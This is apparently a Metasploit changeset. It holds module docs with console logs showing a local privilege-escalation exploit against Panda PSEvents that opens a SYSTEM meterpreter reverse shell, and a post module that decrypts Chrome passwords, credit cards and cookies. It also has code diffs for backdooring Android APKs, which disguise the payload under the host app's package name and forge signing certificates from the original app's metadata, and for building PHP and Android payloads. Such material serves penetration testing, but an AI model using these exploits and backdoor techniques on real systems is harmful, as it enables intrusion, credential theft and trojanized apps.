msf exploit(panda_psevents) > set payload windows/meterpreter/reverse_tcp
|
||||
payload => windows/meterpreter/reverse_tcp
|
||||
msf exploit(panda_psevents) > set exitfunc seh
|
||||
exitfunc => seh
|
||||
msf exploit(panda_psevents) > set DLL CRYPTBASE.dll
|
||||
DLL => CRYPTBASE.dll
|
||||
msf exploit(panda_psevents) > show options
|
||||
|
||||
Module options (exploit/windows/local/panda_psevents):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
DLL CRYPTBASE.dll yes dll to create (Accepted: cryptnet.dll, bcryptPrimitives.dll, CRYPTBASE.dll)
|
||||
ListenerTimeout 3610 yes Number of seconds to wait for the exploit
|
||||
SESSION 1 yes The session to run this module on.
|
||||
|
||||
|
||||
Payload options (windows/meterpreter/reverse_tcp):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
EXITFUNC seh yes Exit technique (Accepted: '', seh, thread, process, none)
|
||||
LHOST 192.168.2.117 yes The listen address
|
||||
LPORT 4450 yes The listen port
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
0 Windows x86
|
||||
|
||||
|
||||
|
||||
msf exploit(panda_psevents) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.2.117:4450
|
||||
[*] Uploading the Payload DLL to the filesystem...
|
||||
[*] Starting the payload handler, waiting for PSEvents.exe to process folder (up to an hour)...
|
||||
[*] Start Time: 2016-09-27 18:10:21 -0400
|
||||
[*] Sending stage (957999 bytes) to 192.168.2.91
|
||||
[*] Meterpreter session 2 opened (192.168.2.117:4450 -> 192.168.2.91:50022) at 2016-09-27 18:46:15 -0400
|
||||
[+] Deleted C:\ProgramData\Panda Security\Panda Devices Agent\Downloads\1a2d7253f106c617b45f675e9be08171\CRYPTBASE.dll
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: NT AUTHORITY\SYSTEM
|
||||
meterpreter > sysinfo
|
||||
Computer : IE11WIN8_1
|
||||
OS : Windows 8.1 (Build 9600).
|
||||
Architecture : x86
|
||||
System Language : en_US
|
||||
Domain : WORKGROUP
|
||||
Logged On Users : 2
|
||||
Meterpreter : x86/win32
|
||||
meterpreter > background
|
||||
|
||||
## Failed Exploitation Attempts
|
||||
|
||||
If the dll doesn't work, PSEvents.exe will fail to run. While silent to the user, an error will occur in the Application Windows Logs.
|
||||
|
||||
* Event ID: 1000
|
||||
* Task Category (100)
|
||||
* Log Name: Application
|
||||
* Source: Application Error
|
||||
* Details:
|
||||
```
|
||||
Faulting application name: PSEvents.exe, version: 4.0.0.35, time stamp: 0x57061ba6
|
||||
Faulting module name: ntdll.dll, version: 6.3.9600.17415, time stamp: 0x54504b06
|
||||
Exception code: 0xc0000374
|
||||
Fault offset: 0x000d0cf2
|
||||
Faulting process id: 0xdd0
|
||||
Faulting application start time: 0x01d218a30fbf1ac5
|
||||
Faulting application path: C:\ProgramData\Panda Security\Panda Devices Agent\Downloads\1a2d7253f106c617b45f675e9be08171\PSEvents.exe
|
||||
Faulting module path: C:\Windows\SYSTEM32\ntdll.dll
|
||||
Report Id: 4de7a07e-8496-11e6-9735-000c29e0cffb
|
||||
Faulting package full name:
|
||||
Faulting package-relative application ID:
|
||||
```
|
|
@ -0,0 +1,89 @@
|
|||
## Vulnerable Application
|
||||
|
||||
This post-exploitation module will extract saved user data from Google Chrome and attempt to decrypt sensitive information.
|
||||
Chrome encrypts sensitive data (passwords and credit card information) which can only be decrypted with the **same** logon credentials. This module tries to decrypt the sensitive data as the current user unless told otherwise via the MIGRATE setting.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start `msfconsole`
|
||||
2. Get meterpreter session
|
||||
3. Do: `use post/windows/gather/enum_chrome`
|
||||
4. Do: `set SESSION <session id>`
|
||||
5. Do: `run`
|
||||
6. You should be able to see the extracted chrome browser data in the loot files in JSON format
|
||||
|
||||
## Options
|
||||
|
||||
- **MIGRATE** - Migrate automatically to explorer.exe. This is useful if you're having SYSTEM privileges, because the process on the target system running meterpreter needs to be owned by the user the data belongs to. If activated the migration is done using the metasploit `post/windows/manage/migrate` module. The default value is false.
|
||||
|
||||
- **SESSION** - The session to run the module on.
|
||||
|
||||
## Extracted data
|
||||
|
||||
- Web data:
|
||||
- General autofill data
|
||||
- Chrome users
|
||||
- Credit card data
|
||||
- Cookies
|
||||
- History
|
||||
- URL history
|
||||
- Download history
|
||||
- Search term history
|
||||
- Login data (username/password)
|
||||
- Bookmarks
|
||||
- Preferences
|
||||
|
||||
## Scenarios
|
||||
|
||||
**Meterpreter session as normal user**
|
||||
|
||||
```
|
||||
[*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.104:51129) at 2016-10-13 20:45:50 +0200
|
||||
|
||||
msf exploit(handler) > use post/windows/gather/enum_chrome
|
||||
msf post(enum_chrome) > set SESSION 1
|
||||
SESSION => 1
|
||||
msf post(enum_chrome) > run
|
||||
|
||||
[*] Impersonating token: 3156
|
||||
[*] Running as user 'user-PC\user'...
|
||||
[*] Extracting data for user 'user'...
|
||||
[*] Downloaded Web Data to '/home/user/.msf4/loot/20161013205236_default_192.168.1.18_chrome.raw.WebD_032796.txt'
|
||||
[*] Downloaded Cookies to '/home/user/.msf4/loot/20161013205238_default_192.168.1.18_chrome.raw.Cooki_749912.txt'
|
||||
[*] Downloaded History to '/home/user/.msf4/loot/20161013205244_default_192.168.1.18_chrome.raw.Histo_307144.txt'
|
||||
[*] Downloaded Login Data to '/home/user/.msf4/loot/20161013205309_default_192.168.1.18_chrome.raw.Login_519738.txt'
|
||||
[*] Downloaded Bookmarks to '/home/user/.msf4/loot/20161013205310_default_192.168.1.18_chrome.raw.Bookm_593102.txt'
|
||||
[*] Downloaded Preferences to '/home/user/.msf4/loot/20161013205311_default_192.168.1.18_chrome.raw.Prefe_742084.txt'
|
||||
[*] Decrypted data saved in: /home/user/.msf4/loot/20161013205909_default_192.168.1.18_chrome.decrypted_173440.txt
|
||||
[*] Post module execution completed
|
||||
```
|
||||
|
||||
**Meterpreter session as system**
|
||||
|
||||
In this case, you should set the MIGRATE setting to true. The module will try to migrate to explorer.exe to decrypt the encrypted data. After the decryption is done, the script will migrate back into the original process.
|
||||
|
||||
```
|
||||
[*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.104:51129) at 2016-10-13 20:45:50 +0200
|
||||
|
||||
msf exploit(handler) > use post/windows/gather/enum_chrome
|
||||
msf post(enum_chrome) > set SESSION 1
|
||||
SESSION => 1
|
||||
msf post(enum_chrome) > set MIGRATE true
|
||||
MIGRATE => true
|
||||
msf post(enum_chrome) > run
|
||||
|
||||
[*] current PID is 1100. migrating into explorer.exe, PID=2916...
|
||||
[*] done.
|
||||
[*] Running as user 'user-PC\user'...
|
||||
[*] Extracting data for user 'user'...
|
||||
[*] Downloaded Web Data to '/home/user/.msf4/loot/20161013205236_default_192.168.1.18_chrome.raw.WebD_032796.txt'
|
||||
[*] Downloaded Cookies to '/home/user/.msf4/loot/20161013205238_default_192.168.1.18_chrome.raw.Cooki_749912.txt'
|
||||
[*] Downloaded History to '/home/user/.msf4/loot/20161013205244_default_192.168.1.18_chrome.raw.Histo_307144.txt'
|
||||
[*] Downloaded Login Data to '/home/user/.msf4/loot/20161013205309_default_192.168.1.18_chrome.raw.Login_519738.txt'
|
||||
[*] Downloaded Bookmarks to '/home/user/.msf4/loot/20161013205310_default_192.168.1.18_chrome.raw.Bookm_593102.txt'
|
||||
[*] Downloaded Preferences to '/home/user/.msf4/loot/20161013205311_default_192.168.1.18_chrome.raw.Prefe_742084.txt'
|
||||
[*] Decrypted data saved in: /home/user/.msf4/loot/20161013205909_default_192.168.1.18_chrome.decrypted_173440.txt
|
||||
[*] migrating back into PID=1100...
|
||||
[*] done.
|
||||
[*] Post module execution completed
|
||||
```
|
|
@ -30,7 +30,7 @@ module Metasploit
|
|||
end
|
||||
end
|
||||
|
||||
VERSION = "4.12.33"
|
||||
VERSION = "4.12.40"
|
||||
MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
|
||||
PRERELEASE = 'dev'
|
||||
HASH = get_hash
|
||||
|
|
|
@ -46,7 +46,11 @@ module Auxiliary::DRDoS
|
|||
bandwidth_amplification = total_size - request.size
|
||||
if bandwidth_amplification > 0
|
||||
vulnerable = true
|
||||
if request.size == 0
|
||||
multiplier = total_size
|
||||
else
|
||||
multiplier = total_size / request.size
|
||||
end
|
||||
this_proof += "a #{multiplier}x, #{bandwidth_amplification}-byte bandwidth amplification"
|
||||
else
|
||||
this_proof += 'no bandwidth amplification'
|
||||
|
|
|
@ -85,10 +85,23 @@ module Msf::DBManager::Import
|
|||
# import_file_detect will raise an error if the filetype
|
||||
# is unknown.
|
||||
def import(args={}, &block)
|
||||
wspace = args[:wspace] || args['wspace'] || workspace
|
||||
preserve_hosts = args[:task].options["DS_PRESERVE_HOSTS"] if args[:task].present? && args[:task].options.present?
|
||||
wspace.update_attribute(:import_fingerprint, true)
|
||||
existing_host_ids = wspace.hosts.map(&:id)
|
||||
data = args[:data] || args['data']
|
||||
ftype = import_filetype_detect(data)
|
||||
yield(:filetype, @import_filedata[:type]) if block
|
||||
self.send "import_#{ftype}".to_sym, args, &block
|
||||
if preserve_hosts
|
||||
new_host_ids = Mdm::Host.where(workspace: wspace).map(&:id)
|
||||
(new_host_ids - existing_host_ids).each do |id|
|
||||
Mdm::Host.where(id: id).first.normalize_os
|
||||
end
|
||||
else
|
||||
Mdm::Host.where(workspace: wspace).each(&:normalize_os)
|
||||
end
|
||||
wspace.update_attribute(:import_fingerprint, false)
|
||||
end
|
||||
|
||||
#
|
||||
|
|
|
@ -26,10 +26,10 @@ module Exploit::CmdStager
|
|||
|
||||
# Constant for decoders - used when checking the default flavor decoder.
|
||||
DECODERS = {
|
||||
:debug_asm => File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "debug_asm"),
|
||||
:debug_write => File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "debug_write"),
|
||||
:vbs => File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64"),
|
||||
:vbs_adodb => File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64_adodb")
|
||||
:debug_asm => File.join(Rex::Exploitation::DATA_DIR, "exploits", "cmdstager", "debug_asm"),
|
||||
:debug_write => File.join(Rex::Exploitation::DATA_DIR, "exploits", "cmdstager", "debug_write"),
|
||||
:vbs => File.join(Rex::Exploitation::DATA_DIR, "exploits", "cmdstager", "vbs_b64"),
|
||||
:vbs_adodb => File.join(Rex::Exploitation::DATA_DIR, "exploits", "cmdstager", "vbs_b64_adodb")
|
||||
}
|
||||
|
||||
attr_accessor :stager_instance
|
||||
|
|
|
@ -2,6 +2,7 @@
|
|||
require 'msf/core'
|
||||
require 'msf/core/payload/uuid/options'
|
||||
require 'msf/core/payload/transport_config'
|
||||
require 'rex/payloads/meterpreter/config'
|
||||
|
||||
module Msf::Payload::Android
|
||||
|
||||
|
@ -37,29 +38,15 @@ module Msf::Payload::Android
|
|||
end
|
||||
|
||||
def apply_options(classes, opts)
|
||||
timeouts = [
|
||||
datastore['SessionExpirationTimeout'].to_s,
|
||||
datastore['SessionCommunicationTimeout'].to_s,
|
||||
datastore['SessionRetryTotal'].to_s,
|
||||
datastore['SessionRetryWait'].to_s
|
||||
].join('-')
|
||||
config = generate_config_bytes(opts)
|
||||
if opts[:stageless]
|
||||
config = generate_config_hex(opts)
|
||||
string_sub(classes, 'UUUU' + ' ' * 8191, 'UUUU' + config)
|
||||
end
|
||||
if opts[:ssl]
|
||||
verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
|
||||
datastore['HandlerSSLCert'])
|
||||
if verify_cert_hash
|
||||
hash = 'WWWW' + verify_cert_hash.unpack("H*").first
|
||||
string_sub(classes, 'WWWW ', hash)
|
||||
end
|
||||
end
|
||||
string_sub(classes, 'ZZZZ' + ' ' * 512, 'ZZZZ' + payload_uri)
|
||||
string_sub(classes, 'TTTT' + ' ' * 48, 'TTTT' + timeouts)
|
||||
config[0] = "\x01"
|
||||
end
|
||||
|
||||
def generate_config_hex(opts={})
|
||||
string_sub(classes, "\xde\xad\xba\xad" + "\x00" * 8191, config)
|
||||
end
|
||||
|
||||
def generate_config_bytes(opts={})
|
||||
opts[:uuid] ||= generate_payload_uuid
|
||||
|
||||
config_opts = {
|
||||
|
@ -71,11 +58,11 @@ module Msf::Payload::Android
|
|||
}
|
||||
|
||||
config = Rex::Payloads::Meterpreter::Config.new(config_opts)
|
||||
config.to_b.unpack('H*').first
|
||||
config.to_b
|
||||
end
|
||||
|
||||
def string_sub(data, placeholder="", input="")
|
||||
data.gsub!(placeholder, input + ' ' * (placeholder.length - input.length))
|
||||
data.gsub!(placeholder, input + "\x00" * (placeholder.length - input.length))
|
||||
end
|
||||
|
||||
def sign_jar(jar)
|
||||
|
|
|
@ -7,15 +7,9 @@ require 'nokogiri'
|
|||
require 'fileutils'
|
||||
require 'optparse'
|
||||
require 'open3'
|
||||
require 'date'
|
||||
|
||||
module Msf::Payload::Apk
|
||||
|
||||
class ApkBackdoor
|
||||
include Msf::Payload::Apk
|
||||
def backdoor_apk(apk, payload)
|
||||
backdoor_payload(apk, payload)
|
||||
end
|
||||
end
|
||||
class Msf::Payload::Apk
|
||||
|
||||
def print_status(msg='')
|
||||
$stderr.puts "[*] #{msg}"
|
||||
|
@ -65,67 +59,71 @@ module Msf::Payload::Apk
|
|||
end
|
||||
end
|
||||
|
||||
def parse_manifest(manifest_file)
|
||||
File.open(manifest_file, "rb"){|file|
|
||||
data = File.read(file)
|
||||
return Nokogiri::XML(data)
|
||||
}
|
||||
end
|
||||
|
||||
def fix_manifest(tempdir)
|
||||
payload_permissions=[]
|
||||
#Load payload's manifest
|
||||
payload_manifest = parse_manifest("#{tempdir}/payload/AndroidManifest.xml")
|
||||
payload_permissions = payload_manifest.xpath("//manifest/uses-permission")
|
||||
|
||||
#Load payload's permissions
|
||||
File.open("#{tempdir}/payload/AndroidManifest.xml","rb"){|file|
|
||||
k=File.read(file)
|
||||
payload_manifest=Nokogiri::XML(k)
|
||||
permissions = payload_manifest.xpath("//manifest/uses-permission")
|
||||
for permission in permissions
|
||||
name=permission.attribute("name")
|
||||
payload_permissions << name.to_s
|
||||
#Load original apk's manifest
|
||||
original_manifest = parse_manifest("#{tempdir}/original/AndroidManifest.xml")
|
||||
original_permissions = original_manifest.xpath("//manifest/uses-permission")
|
||||
|
||||
manifest = original_manifest.xpath('/manifest')
|
||||
old_permissions = []
|
||||
for permission in original_permissions
|
||||
name = permission.attribute("name").to_s
|
||||
old_permissions << name
|
||||
end
|
||||
}
|
||||
|
||||
original_permissions=[]
|
||||
apk_mani=""
|
||||
|
||||
#Load original apk's permissions
|
||||
File.open("#{tempdir}/original/AndroidManifest.xml","rb"){|file2|
|
||||
k=File.read(file2)
|
||||
apk_mani=k
|
||||
original_manifest=Nokogiri::XML(k)
|
||||
permissions = original_manifest.xpath("//manifest/uses-permission")
|
||||
for permission in permissions
|
||||
name=permission.attribute("name")
|
||||
original_permissions << name.to_s
|
||||
end
|
||||
}
|
||||
|
||||
#Get permissions that are not in original APK
|
||||
add_permissions=[]
|
||||
for permission in payload_permissions
|
||||
if !(original_permissions.include? permission)
|
||||
print_status("Adding #{permission}")
|
||||
add_permissions << permission
|
||||
name = permission.attribute("name").to_s
|
||||
unless old_permissions.include?(name)
|
||||
print_status("Adding #{name}")
|
||||
original_permissions.before(permission.to_xml)
|
||||
end
|
||||
end
|
||||
|
||||
inject=0
|
||||
new_mani=""
|
||||
#Inject permissions in original APK's manifest
|
||||
for line in apk_mani.split("\n")
|
||||
if (line.include? "uses-permission" and inject==0)
|
||||
for permission in add_permissions
|
||||
new_mani << '<uses-permission android:name="'+permission+'"/>'+"\n"
|
||||
end
|
||||
new_mani << line+"\n"
|
||||
inject=1
|
||||
else
|
||||
new_mani << line+"\n"
|
||||
end
|
||||
end
|
||||
File.open("#{tempdir}/original/AndroidManifest.xml", "wb") {|file| file.puts new_mani }
|
||||
application = original_manifest.at_xpath('/manifest/application')
|
||||
application << payload_manifest.at_xpath('/manifest/application/receiver').to_xml
|
||||
application << payload_manifest.at_xpath('/manifest/application/service').to_xml
|
||||
|
||||
File.open("#{tempdir}/original/AndroidManifest.xml", "wb") {|file| file.puts original_manifest.to_xml }
|
||||
end
|
||||
|
||||
def backdoor_payload(apkfile, raw_payload)
|
||||
def parse_orig_cert_data(orig_apkfile)
|
||||
orig_cert_data = Array[]
|
||||
keytool_output = run_cmd("keytool -printcert -jarfile #{orig_apkfile}")
|
||||
owner_line = keytool_output.match(/^Owner:.+/)[0]
|
||||
orig_cert_dname = owner_line.gsub(/^.*:/, '').strip
|
||||
orig_cert_data.push("#{orig_cert_dname}")
|
||||
valid_from_line = keytool_output.match(/^Valid from:.+/)[0]
|
||||
from_date_str = valid_from_line.gsub(/^Valid from:/, '').gsub(/until:.+/, '').strip
|
||||
to_date_str = valid_from_line.gsub(/^Valid from:.+until:/, '').strip
|
||||
from_date = DateTime.parse("#{from_date_str}")
|
||||
orig_cert_data.push(from_date.strftime("%Y/%m/%d %T"))
|
||||
to_date = DateTime.parse("#{to_date_str}")
|
||||
validity = (to_date - from_date).to_i
|
||||
orig_cert_data.push("#{validity}")
|
||||
return orig_cert_data
|
||||
end
|
||||
|
||||
def backdoor_apk(apkfile, raw_payload)
|
||||
unless apkfile && File.readable?(apkfile)
|
||||
usage
|
||||
raise RuntimeError, "Invalid template: #{apkfile}"
|
||||
end
|
||||
|
||||
keytool = run_cmd("keytool")
|
||||
unless keytool != nil
|
||||
raise RuntimeError, "keytool not found. If it's not in your PATH, please add it."
|
||||
end
|
||||
|
||||
jarsigner = run_cmd("jarsigner")
|
||||
unless jarsigner != nil
|
||||
raise RuntimeError, "jarsigner not found. If it's not in your PATH, please add it."
|
||||
|
@ -146,20 +144,24 @@ module Msf::Payload::Apk
|
|||
raise RuntimeError, "apktool version #{apk_v} not supported, please download at least version 2.0.1."
|
||||
end
|
||||
|
||||
unless File.readable?(File.expand_path("~/.android/debug.keystore"))
|
||||
android_dir = File.expand_path("~/.android/")
|
||||
unless File.directory?(android_dir)
|
||||
FileUtils::mkdir_p android_dir
|
||||
end
|
||||
print_status "Creating android debug keystore...\n"
|
||||
run_cmd("keytool -genkey -v -keystore ~/.android/debug.keystore \
|
||||
-alias androiddebugkey -storepass android -keypass android -keyalg RSA \
|
||||
-keysize 2048 -validity 10000 -dname 'CN=Android Debug,O=Android,C=US'")
|
||||
end
|
||||
|
||||
#Create temporary directory where work will be done
|
||||
tempdir = Dir.mktmpdir
|
||||
|
||||
keystore = "#{tempdir}/signing.keystore"
|
||||
storepass = "android"
|
||||
keypass = "android"
|
||||
keyalias = "signing.key"
|
||||
orig_cert_data = parse_orig_cert_data(apkfile)
|
||||
orig_cert_dname = orig_cert_data[0]
|
||||
orig_cert_startdate = orig_cert_data[1]
|
||||
orig_cert_validity = orig_cert_data[2]
|
||||
|
||||
print_status "Creating signing key and keystore..\n"
|
||||
run_cmd("keytool -genkey -v -keystore #{keystore} \
|
||||
-alias #{keyalias} -storepass #{storepass} -keypass #{keypass} -keyalg RSA \
|
||||
-keysize 2048 -startdate '#{orig_cert_startdate}' \
|
||||
-validity #{orig_cert_validity} -dname '#{orig_cert_dname}'")
|
||||
|
||||
File.open("#{tempdir}/payload.apk", "wb") {|file| file.puts raw_payload }
|
||||
FileUtils.cp apkfile, "#{tempdir}/original.apk"
|
||||
|
||||
|
@ -168,9 +170,7 @@ module Msf::Payload::Apk
|
|||
print_status "Decompiling payload APK..\n"
|
||||
run_cmd("apktool d #{tempdir}/payload.apk -o #{tempdir}/payload")
|
||||
|
||||
f = File.open("#{tempdir}/original/AndroidManifest.xml")
|
||||
amanifest = Nokogiri::XML(f)
|
||||
f.close
|
||||
amanifest = parse_manifest("#{tempdir}/original/AndroidManifest.xml")
|
||||
|
||||
print_status "Locating hook point..\n"
|
||||
launcheractivity = find_launcher_activity(amanifest)
|
||||
|
@ -194,15 +194,33 @@ module Msf::Payload::Apk
|
|||
raise RuntimeError, "Unable to find onCreate() in #{smalifile}\n"
|
||||
end
|
||||
|
||||
print_status "Copying payload files..\n"
|
||||
FileUtils.mkdir_p("#{tempdir}/original/smali/com/metasploit/stage/")
|
||||
FileUtils.cp Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/Payload*.smali"), "#{tempdir}/original/smali/com/metasploit/stage/"
|
||||
# Remove unused files
|
||||
FileUtils.rm "#{tempdir}/payload/smali/com/metasploit/stage/MainActivity.smali"
|
||||
FileUtils.rm Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/R*.smali")
|
||||
|
||||
payloadhook = entrypoint + "\n invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V"
|
||||
package = amanifest.xpath("//manifest").first['package']
|
||||
package_slash = package.gsub(/\./, "/")
|
||||
print_status "Adding payload as package #{package}\n"
|
||||
payload_files = Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/*.smali")
|
||||
payload_dir = "#{tempdir}/original/smali/#{package_slash}/"
|
||||
FileUtils.mkdir_p payload_dir
|
||||
|
||||
# Copy over the payload files, fixing up the smali code
|
||||
payload_files.each do |file_name|
|
||||
smali = File.read(file_name)
|
||||
newsmali = smali.gsub(/com\/metasploit\/stage/, package_slash)
|
||||
newfilename = "#{payload_dir}#{File.basename file_name}"
|
||||
File.open(newfilename, "wb") {|file| file.puts newsmali }
|
||||
end
|
||||
|
||||
payloadhook = entrypoint + %Q^
|
||||
invoke-static {p0}, L#{package_slash}/MainService;->startService(Landroid/content/Context;)V
|
||||
^
|
||||
hookedsmali = activitysmali.gsub(entrypoint, payloadhook)
|
||||
|
||||
print_status "Loading #{smalifile} and injecting payload..\n"
|
||||
File.open(smalifile, "wb") {|file| file.puts hookedsmali }
|
||||
|
||||
injected_apk = "#{tempdir}/output.apk"
|
||||
aligned_apk = "#{tempdir}/aligned.apk"
|
||||
print_status "Poisoning the manifest with meterpreter permissions..\n"
|
||||
|
@ -211,7 +229,7 @@ module Msf::Payload::Apk
|
|||
print_status "Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}\n"
|
||||
run_cmd("apktool b -o #{injected_apk} #{tempdir}/original")
|
||||
print_status "Signing #{injected_apk}\n"
|
||||
run_cmd("jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey")
|
||||
run_cmd("jarsigner -sigalg SHA1withRSA -digestalg SHA1 -keystore #{keystore} -storepass #{storepass} -keypass #{keypass} #{injected_apk} #{keyalias}")
|
||||
print_status "Aligning #{injected_apk}\n"
|
||||
run_cmd("zipalign 4 #{injected_apk} #{aligned_apk}")
|
||||
|
||||
|
|
|
@ -25,7 +25,7 @@ module Msf::Payload::Php
|
|||
|
||||
# Canonicalize the list of disabled functions to facilitate choosing a
|
||||
# system-like function later.
|
||||
preamble = "
|
||||
preamble = "/*<?php /**/
|
||||
@set_time_limit(0); @ignore_user_abort(1); @ini_set('max_execution_time',0);
|
||||
#{dis}=@ini_get('disable_functions');
|
||||
if(!empty(#{dis})){
|
||||
|
|
|
@ -320,7 +320,7 @@ module Msf
|
|||
gen_payload = raw_payload
|
||||
elsif payload.start_with? "android/" and not template.blank?
|
||||
cli_print "Using APK template: #{template}"
|
||||
apk_backdoor = ::Msf::Payload::Apk::ApkBackdoor::new()
|
||||
apk_backdoor = ::Msf::Payload::Apk.new
|
||||
raw_payload = apk_backdoor.backdoor_apk(template, generate_raw_payload)
|
||||
cli_print "Payload size: #{raw_payload.length} bytes"
|
||||
gen_payload = raw_payload
|
||||
|
|
|
@ -93,7 +93,7 @@ module Msf::Post::Common
|
|||
# /bin/sh.
|
||||
#
|
||||
# This problem was originally solved by using Shellwords.shellwords but
|
||||
# unfortunately, it is retarded. When a backslash occurs inside double
|
||||
# unfortunately, it is unsuitable. When a backslash occurs inside double
|
||||
# quotes (as is often the case with Windows commands) it inexplicably
|
||||
# removes them. So. Shellwords is out.
|
||||
#
|
||||
|
|
|
@ -64,6 +64,8 @@ require 'rex/mime'
|
|||
require 'rex/encoder'
|
||||
# Architecture subsystem
|
||||
require 'rex/arch'
|
||||
# Exploit Helper Library
|
||||
require 'rex/exploitation'
|
||||
|
||||
# Generic classes
|
||||
require 'rex/exceptions'
|
||||
|
|
|
@ -1,11 +0,0 @@
|
|||
# -*- coding: binary -*-
|
||||
|
||||
require 'rex/exploitation/cmdstager/base'
|
||||
require 'rex/exploitation/cmdstager/vbs'
|
||||
require 'rex/exploitation/cmdstager/certutil'
|
||||
require 'rex/exploitation/cmdstager/debug_write'
|
||||
require 'rex/exploitation/cmdstager/debug_asm'
|
||||
require 'rex/exploitation/cmdstager/tftp'
|
||||
require 'rex/exploitation/cmdstager/bourne'
|
||||
require 'rex/exploitation/cmdstager/echo'
|
||||
require 'rex/exploitation/cmdstager/printf'
|
|
@ -1,190 +0,0 @@
|
|||
# -*- coding: binary -*-
|
||||
require 'rex/text'
|
||||
require 'rex/arch'
|
||||
require 'msf/core/framework'
|
||||
|
||||
module Rex
|
||||
module Exploitation
|
||||
|
||||
###
|
||||
#
|
||||
# This class provides an interface to generating cmdstagers.
|
||||
#
|
||||
###
|
||||
|
||||
class CmdStagerBase
|
||||
|
||||
def initialize(exe)
|
||||
@linemax = 2047 # covers most likely cases
|
||||
@exe = exe
|
||||
end
|
||||
|
||||
#
|
||||
# Generates the cmd payload including the h2bv2 decoder and encoded payload.
|
||||
# The resulting commands also perform cleanup, removing any left over files
|
||||
#
|
||||
def generate(opts = {})
|
||||
# Allow temporary directory override
|
||||
@tempdir = opts[:temp]
|
||||
@tempdir ||= "%TEMP%\\"
|
||||
if (@tempdir == '.')
|
||||
@tempdir = ''
|
||||
end
|
||||
|
||||
opts[:linemax] ||= @linemax
|
||||
|
||||
generate_cmds(opts)
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# This does the work of actually building an array of commands that
|
||||
# when executed will create and run an executable payload.
|
||||
#
|
||||
def generate_cmds(opts)
|
||||
|
||||
# Initialize an arry of commands to execute
|
||||
cmds = []
|
||||
|
||||
# Add the exe building commands
|
||||
cmds += generate_cmds_payload(opts)
|
||||
|
||||
# Add the decoder script building commands
|
||||
cmds += generate_cmds_decoder(opts)
|
||||
|
||||
compress_commands(cmds, opts)
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Generate the commands to create an encoded version of the
|
||||
# payload file
|
||||
#
|
||||
def generate_cmds_payload(opts)
|
||||
|
||||
# First encode the payload
|
||||
encoded = encode_payload(opts)
|
||||
|
||||
# Now split it up into usable pieces
|
||||
parts = slice_up_payload(encoded, opts)
|
||||
|
||||
# Turn each part into a valid command
|
||||
parts_to_commands(parts, opts)
|
||||
end
|
||||
|
||||
#
|
||||
# This method is intended to be override by the child class
|
||||
#
|
||||
def encode_payload(opts)
|
||||
# Defaults to nothing
|
||||
""
|
||||
end
|
||||
|
||||
#
|
||||
# We take a string of data and turn it into an array of parts.
|
||||
#
|
||||
# We save opts[:extra] bytes out of every opts[:linemax] for the parts
|
||||
# appended and prepended to the resulting elements.
|
||||
#
|
||||
def slice_up_payload(encoded, opts)
|
||||
tmp = encoded.dup
|
||||
|
||||
parts = []
|
||||
xtra_len = opts[:extra]
|
||||
xtra_len ||= 0
|
||||
while (tmp.length > 0)
|
||||
parts << tmp.slice!(0, (opts[:linemax] - xtra_len))
|
||||
end
|
||||
|
||||
parts
|
||||
end
|
||||
|
||||
#
|
||||
# Combine the parts of the encoded file with the stuff that goes
|
||||
# before / after it -- example "echo " and " >>file"
|
||||
#
|
||||
def parts_to_commands(parts, opts)
|
||||
# Return as-is
|
||||
parts
|
||||
end
|
||||
|
||||
|
||||
|
||||
#
|
||||
# Generate the commands that will decode the file we just created
|
||||
#
|
||||
def generate_cmds_decoder(opts)
|
||||
# Defaults to no commands.
|
||||
[]
|
||||
end
|
||||
|
||||
|
||||
|
||||
#
|
||||
# Compress commands into as few lines as possible. Minimizes the number of
|
||||
# commands to execute while maximizing the number of commands per execution.
|
||||
#
|
||||
def compress_commands(cmds, opts)
|
||||
new_cmds = []
|
||||
line = ''
|
||||
|
||||
concat = opts[:concat_operator] || cmd_concat_operator
|
||||
|
||||
# We cannot compress commands if there is no way to combine commands on
|
||||
# a single line.
|
||||
return cmds unless concat
|
||||
|
||||
cmds.each { |cmd|
|
||||
|
||||
# If this command will fit, concat it and move on.
|
||||
if ((line.length + cmd.length + concat.length) < opts[:linemax])
|
||||
line << concat if line.length > 0
|
||||
line << cmd
|
||||
next
|
||||
end
|
||||
|
||||
# The command wont fit concat'd to this line, if we have something,
|
||||
# we have to add it to the array now.
|
||||
if (line.length > 0)
|
||||
new_cmds << line
|
||||
line = ''
|
||||
end
|
||||
|
||||
# If it won't fit even after emptying the current line, error out..
|
||||
if (cmd.length > opts[:linemax])
|
||||
raise RuntimeError, 'Line too long - %u bytes, max %u' % [cmd.length, opts[:linemax]]
|
||||
end
|
||||
|
||||
# It will indeed fit by itself, lets add it.
|
||||
line << cmd
|
||||
|
||||
}
|
||||
new_cmds << line if (line.length > 0)
|
||||
|
||||
# Return the final array.
|
||||
new_cmds
|
||||
end
|
||||
|
||||
#
|
||||
# Can be overriden. For exmaple, use for unix use ";" instead
|
||||
#
|
||||
def cmd_concat_operator
|
||||
nil
|
||||
end
|
||||
|
||||
# Should be overriden if the cmd stager needs to setup anything
|
||||
# before it's executed
|
||||
def setup(mod = nil)
|
||||
|
||||
end
|
||||
|
||||
#
|
||||
